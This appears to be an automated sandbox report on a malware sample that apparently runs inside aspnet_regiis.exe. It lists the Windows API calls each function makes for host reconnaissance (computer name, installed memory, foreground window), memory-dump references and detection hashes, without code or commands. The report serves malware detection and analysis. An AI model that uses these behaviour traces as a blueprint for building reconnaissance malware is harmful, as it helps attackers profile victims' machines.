                                                                                                                                                                                                              control_flow_graph 1012 770688f0-770688fe call 77096fa0 1015 77068904-7706890b call 77090510 1012->1015 1016 77068cb8-77068cba ExitProcess 1012->1016 1019 77068cb3 call 77098960 1015->1019 1020 77068911-7706893c GetCurrentThreadId 1015->1020 1019->1016 1022 77068944-77068b1f GetForegroundWindow 1020->1022 1023 7706893e-77068942 1020->1023 1024 77068b21-77068b23 1022->1024 1025 77068b28-77068c02 GetCurrentProcessId 1022->1025 1023->1022 1026 77068c7a-77068ca7 call 77069f20 1024->1026 1027 77068c04-77068c06 1025->1027 1028 77068c08-77068c78 1025->1028 1026->1019 1031 77068ca9 call 7706d230 1026->1031 1027->1028 1028->1026 1033 77068cae call 7706bd50 1031->1033 1033->1019
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 77068911
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 77068B17
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 77068B28
                                                                                                                                                                                                                • Part of subcall function 7706BD50: FreeLibrary.KERNEL32(77068CB3), ref: 7706BD56
                                                                                                                                                                                                                • Part of subcall function 7706BD50: FreeLibrary.KERNEL32 ref: 7706BD77
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 77068CBA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitForegroundThreadWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231804404-0
                                                                                                                                                                                                              • Opcode ID: 6dce6c2772ad35a639c35bd617511c35370b1d52e9e13eb22ec5c5f03ff324af
                                                                                                                                                                                                              • Instruction ID: 2cf4330462fd01937703cc933884298f55a2cb230d44ef635a32ba07e8f6fbfd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6dce6c2772ad35a639c35bd617511c35370b1d52e9e13eb22ec5c5f03ff324af
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17A1F473B587054FC308DE6DCD9235AF7D7ABC8620F1AC53EA499DB3A0EA74D8054A81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 7708737E
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 77087485
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID: 97
                                                                                                                                                                                                              • API String ID: 3545744682-3819085924
                                                                                                                                                                                                              • Opcode ID: 6717a38c53d0b11576bf872e74b1562ae3100756fa317abb22d654a5e671ba4f
                                                                                                                                                                                                              • Instruction ID: 688b7f2d68de22c4575c6bb5ef3e9d3fa8db2098539433ea912db5ccdd1a4293
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6717a38c53d0b11576bf872e74b1562ae3100756fa317abb22d654a5e671ba4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF1E430604B818EE726CB39C4547A3BBE3DF57604F08999DC0EB4B786D739A146CB62
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: `
                                                                                                                                                                                                              • API String ID: 0-2679148245
                                                                                                                                                                                                              • Opcode ID: a35ac8d9cbdda738d6e3a74bf42a9f1be588eae3e5b1b8efed126e039bdfacd1
                                                                                                                                                                                                              • Instruction ID: 9020d018180dd4538c779222ea1fae003585694178fc444109d2ef84ad72b837
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a35ac8d9cbdda738d6e3a74bf42a9f1be588eae3e5b1b8efed126e039bdfacd1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF13D471608B808FD725CF38C44535ABFE2AF56314F188A6DD4EA8B3C2D7769446CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                              • Opcode ID: 42d9b0c1402504cb904485db410f3b42bd2ed86c7012387e9739c7f0c9e63fbb
                                                                                                                                                                                                              • Instruction ID: a0c9c6d44399aeab959e9a7abba2df1e8e511a10c746f454140a89791bbfa969
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42d9b0c1402504cb904485db410f3b42bd2ed86c7012387e9739c7f0c9e63fbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E5180B1E152098FDB40EFACDA85A9EBBF1BF48300F114569E898E7350D734A945CF92
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: @$EZ[X
                                                                                                                                                                                                              • API String ID: 2994545307-2076539963
                                                                                                                                                                                                              • Opcode ID: 436f6023dffa5c52d86e0b44c1184136967c5ec5c72fe3356d09f9688e77ab22
                                                                                                                                                                                                              • Instruction ID: fb70e7cdffb2336f6d5a8bd26ccef721530839d67dda8c87c2b77fe8dd8163c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 436f6023dffa5c52d86e0b44c1184136967c5ec5c72fe3356d09f9688e77ab22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D74112B09083008FD705CF28C88576BB7F2EF85B28F11862CE49A57391E7358904CF96
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 7708860C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3960555810-0
                                                                                                                                                                                                              • Opcode ID: 9dd4729f1826a40616ef57b00ccebd8848ec9d607b0242ea5d4f637715fad918
                                                                                                                                                                                                              • Instruction ID: 40606c98f64340172928d4b849354c241eee16713ecc75e4d0f75454de9fa5cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dd4729f1826a40616ef57b00ccebd8848ec9d607b0242ea5d4f637715fad918
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36A1C271618B818FD32ACF3984507A7BBE2AF57704F18896DC4EB8B782D779A405CB11
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c891c85a27c85991534015be04779e727d71fa3de927d26b44da3b85744cdab0
                                                                                                                                                                                                              • Instruction ID: 22438ef0659dd9aa2c65ac3832bc532f251cb924bf431a9f718807d1fd0cb984
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c891c85a27c85991534015be04779e727d71fa3de927d26b44da3b85744cdab0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9951CEB1600B428FCB24CF29C491A97BBF2AF45604F154A2DC2D78BB82E731F405CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 77098A54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: ef7a6fdd5831fb669a38be0d3d8b76147bb8a27e0b5e45baa684b65bb4d7dfbe
                                                                                                                                                                                                              • Instruction ID: 930f272c652cabe0d37780e5d094ec41581fb17b995b44d94ea99aaa0284aba5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef7a6fdd5831fb669a38be0d3d8b76147bb8a27e0b5e45baa684b65bb4d7dfbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8111227BB116028FDB058EA9DC95785BBB0BF09250F0906B5D540CB282D6BDC9058BC6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(7709C62B,005C003F,0000000B,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 77098AAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                                                                                              • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                              • Opcode ID: 9ce31fdc9fe5e458dc3d4516d66cdb6824292347c7717bed96ba777f0a390bfc
                                                                                                                                                                                                              • Instruction ID: 5aba18243829dd8ff4f2737bdf0ddbfc41fa5827c39f83a76ac08b8c857984d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ce31fdc9fe5e458dc3d4516d66cdb6824292347c7717bed96ba777f0a390bfc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF21DF7151A3048FC304DF68D8C166BBBF6EF96714F11893CEA8987290D73494088F9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a31999a1f1d028d44c8f11d891ad959cb656a0316a27a3a60a065ad308595bbf
                                                                                                                                                                                                              • Instruction ID: 0ee165e740664f480e803020f0232f12c49f185d0ffb2ec65820259892ca2b9b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a31999a1f1d028d44c8f11d891ad959cb656a0316a27a3a60a065ad308595bbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40B1D176E11216CFDB14CFA9C8827AEB7F2FB09314F168569D946A7380DB789D00CB90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d0f824c2d14fc99efce3518037a2a4148ed998d79f062cb23b4d1df1daf8307f
                                                                                                                                                                                                              • Instruction ID: 99fed9351b81730bd42144a19f9be4ba9a93116de885358b6d0a21c6a24238f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0f824c2d14fc99efce3518037a2a4148ed998d79f062cb23b4d1df1daf8307f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA4129715083829BC3125F79C8A831ABBE69F56A40F19447DE8D6CB396E3B4C548C763
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 79c3cc0c25469abea17998396629d3b934bcb294ff74f93c0000771716f9225d
                                                                                                                                                                                                              • Instruction ID: 2565e6711244c8ee5a3a2b01fef378c152667e1e4d11372b5aea52aa3d4524a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79c3cc0c25469abea17998396629d3b934bcb294ff74f93c0000771716f9225d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1321347271A701CFD3098E6589D367AB3F6EBC6A14F2A593CC593C7381D67888019B49
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3e0eb9a61165eef9abb379cfc1e77d0c13e978966059bb08c318641b5aec0ba6
                                                                                                                                                                                                              • Instruction ID: e8fb9d0560528e43de23dffbb684a98d788a5aaa08509a42c66c4093778d2561
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e0eb9a61165eef9abb379cfc1e77d0c13e978966059bb08c318641b5aec0ba6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72D0C7356451166FC224CF15CC82F76B6FDA757688F232815B606E7380D554E411865C
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 7706D596
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 7706D6B9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                              • Opcode ID: b69d8eaa31b6733bc59511883eb2b0145102ef4dfa0505c95e80c14cda76d2a2
                                                                                                                                                                                                              • Instruction ID: abf753f822d541c0688e7f227f2ed4cdc45933405006e0ee784ca4e60806fb6d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b69d8eaa31b6733bc59511883eb2b0145102ef4dfa0505c95e80c14cda76d2a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF4108B5C10B40AFD370EF39DA0B7127EB4AB05210F50872DF8E68A6C4E635A4198BD7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 77095548
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 8b6608dfb18c37a44a6178fd66f7822262ea2136826dd61ba946a946bd45b144
                                                                                                                                                                                                              • Instruction ID: 74b10138d714617ac4d760ec5b5be82db6f1dc3346a70a62783c6fb8429a88b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b6608dfb18c37a44a6178fd66f7822262ea2136826dd61ba946a946bd45b144
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F02B712943426FC319DE56ECD2E5F3BAFD789211F29086CE9CA97340C5244C01C795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 7706D6B9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1818045373.0000000077061000.00000020.00000400.00020000.00000000.sdmp, Offset: 77060000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.1817972837.0000000077060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818085747.000000007709E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818115258.00000000770A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.1818138837.00000000770B3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_77060000_aspnet_regiis.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                              • Opcode ID: 7dedca6fcb6a0ed923900a7cf6531418ce192fd32bf64b0790e878aed4914350
                                                                                                                                                                                                              • Instruction ID: 4fe28a7450c842faadc98337b1b178b791233fd488bc3a13878fe551314efa71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7dedca6fcb6a0ed923900a7cf6531418ce192fd32bf64b0790e878aed4914350
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7601C0B5D01A019BD728AF39D5173533BA1B781310F148B1DE4E24A6C8E634A02A8BC6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000), ref: 770955DF
